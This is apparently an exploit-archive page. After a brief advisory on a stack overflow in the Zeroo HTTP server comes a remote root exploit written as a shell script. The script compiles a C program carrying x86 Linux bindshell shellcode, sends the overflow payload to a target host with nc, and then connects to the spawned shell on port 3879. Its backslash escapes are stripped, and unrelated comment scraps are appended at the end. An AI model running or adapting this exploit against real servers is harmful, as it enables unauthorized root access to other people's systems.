source: http://www.securityfocus.com/bid/6190/info
Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms.
It has been reported that Zeroo HTTP server does not sufficiently check bounds on some requests. This occurs when a string of excessive length is received by the server. This can result in the overwriting of stack memory, and potential code execution.
#!/bin/sh
#
# 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit for Linux
#
# __
# exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
# My World: http://x82.i21c.net
#
(printf "n 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit");
(printf "n by x82 in INetCop(c)nn");
#
if [ "$2" = "" ]; then
(printf " Usage: 0x82-Zer00.sh [hostname] [port]nn");
exit; fi
#
cat >0x82-Remote-Zeroosubugxpl.c<< X82X82
#define Xpl017Elz x82
int main(/* args? */) {
int num;
char b1ndsh[] = /* Linux(x86) bindshell on port 3879 */
"x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
"x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
"x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
"x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
"x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
"xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75"
"x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
"x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh";
for(num=0;num<0xa4;num+=4)
printf("xc0xf4xffxbf"); // this's &shellcode
for(num=0;num<0x02a8-strlen(b1ndsh);num++)
printf("N"); /* nop...NNNNNNNNNNNNN...NNNNNNNNNNNNN;;; */
printf("%s",b1ndsh); /* shellcode */
for(num=0;num<0xb4;num++)
printf("xff"); /* byteother */
printf("rn");
}
X82X82
#
(printf " { 0x00. Compile exploit. }n");
make 0x82-Remote-Zeroosubugxpl
(printf " { 0x01. Send code ! }n");
(./0x82-Remote-Zeroosubugxpl;cat)|nc $1 $2 &
(printf " { 0x02. OK, Try $1:3879 ... }n");
nc $1 3879
(printf " { 0x03. Connection closed. }n");
#
(printf " { 0x04. Delete exploit code. }n");
rm -f 0x82-Remote-Zeroosubugxpl*
(printf " { 0x05. End :-}nn");
#
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666